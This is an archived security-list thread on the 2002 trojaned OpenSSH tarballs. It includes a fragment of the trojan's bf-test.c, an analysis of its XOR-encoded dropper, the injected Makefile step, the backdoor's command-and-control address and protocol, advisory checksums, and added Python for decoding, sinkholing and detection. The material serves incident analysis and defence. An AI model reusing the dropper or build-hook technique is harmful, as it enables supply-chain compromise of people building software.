+#ifdef CHARSET_EPCDIC
+    epcdic2ascii(ecb_data, strlen(ecb_data));
+#endif
+
+    printf("# testing in raw ecb mode\n");
+
+    n=0;
+    if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0)
+    {
+        err = 1;
+    }
+
+    if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0)
+    {
+        err = 1;
+    }
+
+    if (err)
+    {
+        for (i = 0; i < sizeof(ecb_data)-1; i++)
+            fprintf(stderr, "%c", ecb_data[i] ^ 47);
+    }
+return(0);
+}
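Review bot: the file's stated purpose does not match what main() does, and that mismatch is the point to raise first. The header comment promises a Blowfish vector check for "HP-UX PL.2", but no Blowfish code is ever called: the only logic compares `bfcipher[0]` and `bfplain[0]` against `cbc_iv`, which can never be equal, so `err` is always set (and it is never initialised, so the branch would be taken on stack garbage even if they were); `key_test`, `ocb_data`, `cbc_key`, `cbc_in`/`cbc_out`/`iv` and the `_CRAY` ifdef are never used, and the `CHARSET_EPCDIC` guard is misspelt (OpenSSL's macro is `CHARSET_EBCDIC`), so that block can never compile in. The real behaviour is the final loop: every byte of `ecb_data[]` XOR 47 is written to stderr, which `dup2(1, 2)` has pointed at stdout, i.e. into the `bf-test.out` file the Makefile recipe redirects to. The first ten bytes (`0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25`) decode to `#!/bin/sh` plus a newline, and because stdout is buffered while stderr is not, the `# testing in raw ecb mode` banner is flushed last and lands at the bottom of the script as a shell comment, exactly as the captured bf-test output earlier in this message shows. Suggested action: reject outright; a test program that emits a fixed XOR of a byte table is a dropper, and if a Blowfish check is really wanted the reviewer should ask for the vectors and the call into the Blowfish code.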
(8799826) /Christian Bahls <christian.bahls@stud.uni-rostock.de>/(Reflowed)
Comment in text 8799863

Comment in text 8802039 by Jim Breton <jamesb-bugtraq@alongtheway.com>
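The bf-test.c decoy in the analysis above hides the dropper script in `ecb_data[]` and only reveals it through `fprintf(stderr, "%c", ecb_data[i] ^ 47)`. The Python below is an added example, not code from the post and not part of the trojan: it pulls the byte literals out of a C initializer, recovers the single-byte XOR key by brute force (searching for a `#!/` shebang instead of assuming 47) and decodes the blob. `ECB_DATA_SRC` is a constructed sample holding only the first five lines of the array exactly as they appear in the diff (55 of its several hundred bytes); feed `decode_dropper` the whole initializer text to recover the complete script.

```python
import re
from typing import Optional, Tuple

# Constructed sample input: the first five lines of ecb_data[] as printed in
# the bf-test.c diff above (55 bytes of the full array).
ECB_DATA_SRC = """
    0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
    0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
    0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
    0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
    0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
"""

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{1,2})")


def parse_c_byte_array(src: str) -> bytes:
    """Extract the 0x.. byte literals from a C initializer body; braces,
    commas, whitespace and comments are ignored."""
    return bytes(int(tok, 16) for tok in HEX_LITERAL.findall(src))


def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same operation encodes and decodes."""
    return bytes(b ^ key for b in data)


def recover_xor_key(data: bytes, prefix: bytes = b"#!/") -> Optional[int]:
    """Try all 256 single-byte keys and return the one under which the blob
    starts with a shell shebang; None if no key produces it. For a one-byte
    key the first plaintext byte pins the key down, so at most one key fits."""
    if len(data) < len(prefix):
        return None
    for key in range(256):
        if xor_decode(data[: len(prefix)], key) == prefix:
            return key
    return None


def decode_dropper(src: str = ECB_DATA_SRC) -> Tuple[Optional[int], str]:
    """Return (key, decoded script) for a C initializer, or (None, '')."""
    data = parse_c_byte_array(src)
    # bf-test prints sizeof(ecb_data)-1 bytes, i.e. it drops the array's
    # terminating 0x00; mirror that when a full initializer is passed in.
    if data.endswith(b"\x00"):
        data = data[:-1]
    key = recover_xor_key(data)
    if key is None:
        return None, ""
    return key, xor_decode(data, key).decode("ascii", errors="replace")


if __name__ == "__main__":
    key, script = decode_dropper()
    print(f"xor key: {key}")
    print(script, end="")
```

On the sample above the recovered key is 47 and the output begins `#!/bin/sh`, `cat >conftest.c <<_ACEOF`, `#include <stdio.h>`, matching the captured bf-test output in the post. The same brute-force works for any single-byte XOR blob whose plaintext has a predictable prefix; the prefix is the only assumption the key recovery makes.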
8802039 2002-08-01 18:45 +0000  /29 lines/ Jim Breton <jamesb-bugtraq@alongtheway.com>
Sent by: joel@lysator.liu.se
Imported: 2002-08-02 00:33 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23459>
Comment on text 8799826 by Christian Bahls <christian.bahls@stud.uni-rostock.de>
Subject: Re: trojan horse in recent openssh (version 3.4 portable 1)
------------------------------------------------------------
From: Jim Breton <jamesb-bugtraq@alongtheway.com>
To: bugtraq@securityfocus.com
Message-ID: <20020801184534460715.G1299@alongtheway.com>

On Thu, Aug 01, 2002 at 02:17:36PM +0200, Christian Bahls wrote:
> 1.) I do not often check signatures on packages I install

Particularly difficult when there _are no_ signatures available for
the package you want to install (in this case, the non-"portable"
tarballs).

AFAIK there have never been signatures available for the OpenBSD
tarballs.  At least none that I've seen on the FTP server.  I hope
this will change soon...?

I have also been curious as to how exactly DJM and the portability
group have been verifying that _they_ obtained clean tarballs before
applying their modifications.  If they also have no way to verify
tarballs, that effectively blinds a very important set of eyes from
being able to spot trojans.

(Of course, if they are just doing CVS checkouts from a secure CVS
server, this issue would be moot.  But the fact that the portable
versions were also trojaned, combined with the appearance that the
trojaning occurred _on the FTP server and not on any development
machines_, I think allows one to reasonably assume that the tarballs
are being used.  This last point may not be the case, we will have to
wait for more information to come out.)
(8802039) /Jim Breton <jamesb-bugtraq@alongtheway.com>/(Reflowed)

8800840 2002-08-01 11:18 -0400  /54 lines/ Niels Provos <provos@citi.umich.edu>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 18:35 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23433>
Subject: OpenSSH Security Advisory:  Trojaned Distribution Files
------------------------------------------------------------
From: Niels Provos <provos@citi.umich.edu>
To: bugtraq@securityfocus.com
Message-ID: <20020801151812.GE6925@citi.citi.umich.edu>

OpenSSH Security Advisory (adv.trojan)

1. Systems affected:

OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the
OpenBSD ftp server and potentially propagated via the normal mirroring
process to other ftp servers.  The code was inserted some time between
the 30th and 31st of July.  We replaced the trojaned files with their
originals at 7AM MDT, August 1st.

2. Impact:

Anyone who has installed OpenSSH from the OpenBSD ftp server or any
mirror within that time frame should consider his system compromised.
The trojan allows the attacker to gain control of the system as the
user compiling the binary.  Arbitrary commands can be executed.

3. Solution:

Verify that you did not build a trojaned version of the sources.  The
portable SSH tarballs contain PGP signatures that should be verified
before installation.  You can also use the following MD5 checksums for
verification.

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 
MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a

4. Details:

When building the OpenSSH binaries, the trojan resides in bf-test.c
and causes code to execute which connects to a specified IP address.
The destination port is normally used by the IRC protocol.  A
connection attempt is made once an hour.  If the connection is
successful, arbitrary commands may be executed.

Three commands are understood by the backdoor:

Command A:  Kill the exploit.
Command D:  Execute a command.
Command M:  Go to sleep.

5. Notice:

Because of the urgency of this issue, the advisory may not be
complete.  Updates will be posted to the OpenSSH web pages if
necessary.
(8800840) /Niels Provos <provos@citi.umich.edu>/----
Attachment (application/pgp-signature) in text 8800841
8800841 2002-08-01 11:18 -0400  /13 lines/ Niels Provos <provos@citi.umich.edu>
Imported: 2002-08-01 18:35 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23434>
Attachment (text/plain) to text 8800840
Subject: Attachment to: OpenSSH Security Advisory:  Trojaned Distribution Files
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (OpenBSD)
Comment: For info see http://www.gnupg.org

iQEVAwUBPUlRNDZ8FqYKL4flAQHVQQgAi88o43SftqLHXvkn/J0yKYjKsNf42yoB
KXfLrFDD7DeYFNnXUol5XLVvjEpEkmSPIh/fXNXptkM8J7MXFcOMpzu0rb+3PMAo
K73r0MePJ++4SzYD4Qn0yz7TOGpaMHVfK1lUx6sHUx50yRYp6Mmt4f5vZenhGvOF
REhcsvaNBBGHyHo7dnqIy+viupR4QkaeZ0aeIgbSoQhilYclzw5MwK2PwK/9MV1r
RuL1UAhA2oG0nlM0f9fYcI5iWDuMDq5XC+oqWXOJ0ivMyyoQeL7Mh4IIm1wNV55Q
f2eThXAVPkC+d1KifUJOa01DUwxwHYIwdnaEaEUUCde37JGsnAvWIg==
=s0fY
-----END PGP SIGNATURE-----
(8800841) /Niels Provos <provos@citi.umich.edu>/----
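The advisory's three commands make up a one-byte protocol: the implant connects out to 203.62.158.32:6667, reads a single byte, and exits on `A`, hands the socket to `/bin/sh` on `D`, or sleeps an hour and reconnects on `M`. The Python below is an added example, not part of the advisory and not the trojan's code: it is a sinkhole that answers every beacon with `A`, which is what a responder who controls the beacon address (or redirects traffic to it at a firewall) can do to make outstanding implants exit, together with a simulation of the implant side that follows the C code's connect/read/switch flow but only reports what it would do, never spawning a shell. The loopback address, ephemeral port and the outcome labels (`exit`, `shell`, `sleep`, `closed`, `unknown`) are constructed for the demo.

```python
import socket
import threading
from typing import List, Tuple

# The three one-byte commands named in the advisory.
KILL, SHELL, SLEEP = b"A", b"D", b"M"


def dispatch(c: bytes) -> str:
    """What the implant does with the single byte it reads, per the C source.
    The return value is a label for the demo; a real implant would act on it."""
    if c == b"":
        return "closed"      # read() returned 0: implant calls exit(0)
    if c == KILL:
        return "exit"        # 'A': exit(0)
    if c == SHELL:
        return "shell"       # 'D': dup2 socket onto fds 0-2, execve("/bin/sh")
    if c == SLEEP:
        return "sleep"       # 'M': close socket, sleep(3600), reconnect
    return "unknown"         # anything else: fall out of the switch, reconnect at once


def start_sinkhole(reply: bytes = KILL, max_clients: int = 1,
                   host: str = "127.0.0.1") -> Tuple[int, List[str], threading.Thread]:
    """Listen on an ephemeral loopback port (constructed for the demo; a real
    sinkhole sits on the beacon address, port 6667), answer each connecting
    implant with `reply` and log its source. Returns (port, log, thread)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    log: List[str] = []

    def serve() -> None:
        for _ in range(max_clients):
            conn, addr = srv.accept()
            with conn:
                conn.sendall(reply)          # one byte is the whole protocol
                log.append(f"{addr[0]}:{addr[1]} -> sent {reply!r}")
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, log, t


def simulate_implant(host: str, port: int, timeout: float = 10.0) -> str:
    """Mirror the implant's flow: connect, read exactly one byte (the C code
    gives connect+read ten seconds via alarm(10)), then dispatch."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        c = s.recv(1)
    return dispatch(c)


def neutralise_one(host: str = "127.0.0.1") -> Tuple[str, List[str]]:
    """Run one beacon against a KILL sinkhole; return what the implant did."""
    port, log, t = start_sinkhole(KILL, host=host)
    outcome = simulate_implant(host, port)
    t.join(5)
    return outcome, log


if __name__ == "__main__":
    print(neutralise_one())
```

A sinkhole that accepts and then sends nothing is not harmless: the implant's `alarm(10)` fires during `read`, the handler sleeps 3600 seconds and retries, which is the hourly beacon the advisory describes. Sending `A` is the only reply that ends the loop; the source addresses the sinkhole logs are the list of hosts that built the trojaned tarball.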
8801656 2002-08-01 19:56 +0300  /96 lines/ Tomi Nylund <wizard@university.in.oulu.fi.invalid>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 22:19 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23446>
Subject: List of mirrors carrying trojaned OpenSSH
------------------------------------------------------------
From: Tomi Nylund <wizard@university.in.oulu.fi.invalid>
To: bugtraq@securityfocus.com
Message-ID: <3D496836.5C8D56D1@university.in.oulu.fi.invalid>

Hello,

my first post to the list. Cool.. :)

Sorry for the horrible formatting: this was posted in haste using
Netscape's Mail client :(

Anyways, we did some research here at Oulu regarding the propagation
of the trojaned OpenSSH-3.4p1.tar.gz, and found out the following:

Trojaned mirrors:

MD5 (./ftp.club-internet.fr/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.easynet.be/openssh/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.freenet.de/pub/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.fsn.hu/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.inet.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.isu.net.sa/pub/mirrors/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.jaquet.dk/pub/openSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.openbsd.cz/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.openbsd.org.br/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.openbsd.ru/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.sajinet.com.pe/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.stealth.net/pub/mirrors/ftp.openssh.com/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.tku.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.uninett.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.volftp.mondadori.com/mirror/openbsd/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp7.usa.openbsd.org/pub/os/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./hal.csd.auth.gr/mirrors/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./openbsd.csie.nctu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./openbsd.nsysu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./openbsd.rug.ac.be/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

The list was taken from http://www.openssh.com/portable.html; it does
NOT contain all the mirrors out there, just the primary ones, I
guess..  The list was taken around 1700 hours EEST.

Also, it should be apparent that NOTHING from ftp.openbsd.org should
be trusted until their sysadmins have done a full damage assessment.

Also, some people have debated the severity of opening a shell to
some remote location. Please note that any commands may be run over
such a connection, perhaps patching the OpenSSH source code a bit
further, or dropping a platform-specific rootkit onto the victim's
system: the author had gone to great lengths to make the code as
portable as possible.

My e-mail address is obfuscated to repel spammers; however, if you
wish to contact me or any other members of our group, you'll find our
contact details on our web pages.


Regards,

Tomi

--------------Tomi Nylund, Research Scientist, OUSPG----------------
Group info & contact details at http://www.ee.oulu.fi/research/ouspg
PGP key: http://www.ee.oulu.fi/research/ouspg/ouspg-key.asc
Key fingerprint =  B2 F7 97 09 F5 4C 29 97  9A A8 2D FB 59 CA 10 C4
-------------Oulu University Secure Programming Group---------------
(8801656) /Tomi Nylund <wizard@university.in.oulu.fi.invalid>/(Reflowed)
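The advisory gives the clean checksums, the first post and the OUSPG mirror survey above give the trojaned one, and the dropper script in the analysis names the on-disk indicators (an extra `bf-test.c` and a `bf-test` recipe in `openbsd-compat/Makefile.in`). The Python below is an added example, not from any of the posts: it classifies a downloaded tarball against both hash lists and scans an unpacked source tree for the injected build step. `KNOWN_GOOD` and `TROJANED_3_4P1` are copied from the advisory and the survey; the tree that `demo()` builds is constructed here, and its tarball stand-in is an empty file, so it classifies as `unknown`.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, List

# Known-good MD5s from the OpenSSH advisory above.
KNOWN_GOOD: Dict[str, str] = {
    "openssh-3.4p1.tar.gz": "459c1d0262e939d6432f193c7a4ba8a8",
    "openssh-3.4.tgz": "39659226ff5b0d16d0290b21f67c46f2",
    "openssh-3.2.2p1.tar.gz": "9d3e1e31e8d6cdbfa3036cb183aa4a01",
}
# The trojaned openssh-3.4p1.tar.gz, as reported in the first post and seen
# on every mirror in the OUSPG survey above.
TROJANED_3_4P1 = "3ac9bc346d736b4a51d676faa2a08a57"

# Any mention of bf-test in a makefile is the injected build step.
INJECTED = re.compile(rb"bf-test")


def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def classify_digest(filename: str, digest: str) -> str:
    """'trojaned' for the known-bad digest, 'ok' if it matches the advisory's
    value for that filename, else 'unknown' (which should be treated as bad)."""
    if digest == TROJANED_3_4P1:
        return "trojaned"
    if KNOWN_GOOD.get(filename) == digest:
        return "ok"
    return "unknown"


def classify_tarball(path: str) -> str:
    return classify_digest(os.path.basename(path), md5_file(path))


def scan_source_tree(root: str) -> List[str]:
    """Report bf-test* files and bf-test lines in Makefile / Makefile.in
    anywhere under an unpacked source tree."""
    findings: List[str] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.startswith("bf-test"):
                findings.append(f"unexpected file: {rel}")
            elif name in ("Makefile", "Makefile.in"):
                with open(full, "rb") as f:
                    for lineno, line in enumerate(f, 1):
                        if INJECTED.search(line):
                            findings.append(f"{rel}:{lineno}: {line.decode('latin-1').strip()}")
    return sorted(findings)


def demo() -> dict:
    """Constructed sample: a tree carrying the injected recipe and the decoy
    file, plus an empty file standing in for the tarball."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = os.path.join(tmp, "openssh-3.4p1")
        compat = os.path.join(tree, "openbsd-compat")
        os.makedirs(compat)
        with open(os.path.join(compat, "Makefile.in"), "w") as f:
            f.write("all: libopenbsd-compat.a\n"
                    "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; "
                    "sh ./bf-test.out &\n")
        open(os.path.join(compat, "bf-test.c"), "w").close()
        tarball = os.path.join(tmp, "openssh-3.4p1.tar.gz")
        open(tarball, "wb").close()
        return {
            "tarball": classify_tarball(tarball),
            "empty_md5": md5_file(tarball),
            "findings": scan_source_tree(tree),
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Two caveats that follow from the dropper script above. First, after it has run it deletes `bf-test*` and greps every `bf-test` line out of `Makefile` and `Makefile.in`, so the tree scan only works on a freshly unpacked tree, before `make` is invoked. Second, the implant binary is compiled under a name taken from the user's passwd entry (`basename` of the `grep $USER: /etc/passwd` line, normally the login shell's name, with `sh` as the fallback), so on a machine that has already built the package the thing to look for is a process with that name holding a connection to 203.62.158.32:6667, not a file. An MD5 match only says the file is the one the advisory published; the `.sig` the advisory points at, checked against the OpenSSH release key, is the stronger test.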